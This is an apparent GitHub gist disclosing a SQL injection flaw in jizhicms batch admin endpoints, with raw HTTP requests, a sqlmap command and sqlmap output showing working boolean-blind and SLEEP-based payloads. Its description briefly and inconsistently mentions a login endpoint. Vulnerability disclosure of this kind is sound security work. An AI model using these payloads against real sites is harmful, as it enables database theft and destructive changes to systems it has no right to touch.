Skip to content

Instantly share code, notes, and snippets.

@0psPwn

0psPwn/jizhiCMS_sql_injection.md Secret

Last active February 27, 2026 01:50
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save 0psPwn/46468da7329f7c676c737b4b6b473ddc to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save 0psPwn/46468da7329f7c676c737b4b6b473ddc to your computer and use it in GitHub Desktop.
Download ZIP
Raw
jizhiCMS_sql_injection.md

SQL Injection Vulnerability in jizhicms ≤ 2.5.6 Batch API

CVE-ID: CVE-2026-3292

BUG_Author: 0ps

Affected Version: jizhicms ≤ 2.5.6

Vendor: 极致CMS | 免费开源的建站系统-快速建站系统-极致官网 - 极速建站程序优选【极致CMS】

Software: Cherry-toto/jizhicms: 极致CMS(以下简称:JIZHICMS)是一款开源免费,无商业授权的建站系统。

Vulnerability Files:

  • frphp/common/Functions.php:52-87format_param(..., 1)
  • frphp/lib/Model.php:217-257 (public function findAll)
  • frphp/extend/DB_API.php:164-191 (public function findAll)

Description:

  1. ORM Supports Direct Concatenation of String Conditions (Root Cause):

    • The file frphp/lib/Model.php directly concatenates WHERE clauses in multiple places when $conditions is a string.
    • This can be exploited by sending a crafted request to the login endpoint with malicious SQL code.

  2. Filtering Is Insufficient:

    • Parameter filtering: frphp/common/Functions.php:52-87 (format_param(..., 1))

      • Mainly uses htmlspecialchars + addslashes for processing

    • However, id in( ... ) falls into an unquoted numeric context, where attackers can construct injection snippets that do not require quotation marks

      Most of these interfaces are for delete/update operations, and their verification is destructive.

Proof of Concept (POC):

  1. Log in to obtain the admin cookie:

    http://<target-ip>/index.php/admins/

  2. There are multiple places where batch interfaces are called. Basically, as long as there is a batch function, there will be an SQL injection vulnerability. Three sample data packets (test.txt) are provided below:

    • POST /index.php/admins/Article/changeType.html HTTP/1.1
Host: localhost:8088
Content-Length: 51
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8088
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8088/index.php/admins/Article/articlelist.html
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
Connection: keep-alive

tid=2&data=12%2C11%2C10%2C9%2C8%2C7%2C6%2C5%2C4%2C3
    • POST /index.php/admins/Product/changeType.html HTTP/1.1
Host: localhost:8088
Content-Length: 50
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8088
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8088/index.php/admins/Product/productlist.html
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
Connection: keep-alive

data=11%2C10%2C9%2C8%2C7%2C6%2C5%2C4%2C3%2C2&tid=6
    • POST /index.php/admins/Message/checkAll.html HTTP/1.1
Host: localhost:8088
Content-Length: 19
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8088
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8088/index.php/admins/Message/messagelist.html
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=f0rbvslo0m2bnbsht0ueoankvc
Connection: keep-alive

data=2%2C1&isshow=1

    1. Use sqlmap for automated testing:

      sqlmap -r test.txt --risk=3 --level=5

    2. If successful, it will be displayed as follows:

      POST parameter 'data' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection point(s) with a total of 1133 HTTP(s) requests:
---
Parameter: data (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: tid=2&data=12,11,10,9,8,7,6,5,4,3) AND 6573=(SELECT (CASE WHEN (6573=6573) THEN 6573 ELSE (SELECT 1049 UNION SELECT 7808) END))-- NXKU

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: tid=2&data=12,11,10,9,8,7,6,5,4,3) OR SLEEP(5)-- kCcq
---
[15:16:30] [INFO] the back-end DBMS is MySQL
web application technology: PHP, Nginx 1.15.11
back-end DBMS: MySQL >= 5.0.12
[15:16:39] [INFO]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment